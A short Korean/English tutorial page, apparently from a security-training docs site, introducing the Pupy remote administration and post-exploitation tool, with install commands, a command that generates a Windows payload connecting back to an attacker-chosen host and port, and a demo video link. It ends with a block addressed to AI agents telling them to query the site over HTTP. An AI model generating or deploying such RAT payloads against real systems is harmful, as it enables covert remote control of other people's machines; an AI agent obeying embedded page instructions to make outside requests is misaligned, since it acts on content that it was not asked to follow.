# Kali Linux | Usage Pupy Remote Administrator Tool

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux | Usage Pupy Remote Administrator Tool &#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> Pupy 툴 에 대한 시현 영상입니다. Windows, Linux, OSX, Android 장치의 RAT 생성 및 지원 툴입니다.

### Description :&#x20;

> Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

### Infomation :&#x20;

> GitHub : <https://github.com/n1nj4sec/pupy>
>
> Install note
>
> ```
> git clone https://github.com/n1nj4sec/pupy.git cd pupy git submodule init git submodule update             ## Long Time pip install -r requirements.txt
> ```
>
> Usage it:
>
> ```
> $ ./pupygen.py -f exe_x64 -o test.ext connect --host 192.168.0.20:4444 $ ./pupysh.py
> ```

{% embed url="<https://youtu.be/sXO0V7AZtwo>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sec.skill.or.kr/hacking/pupy-tool.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
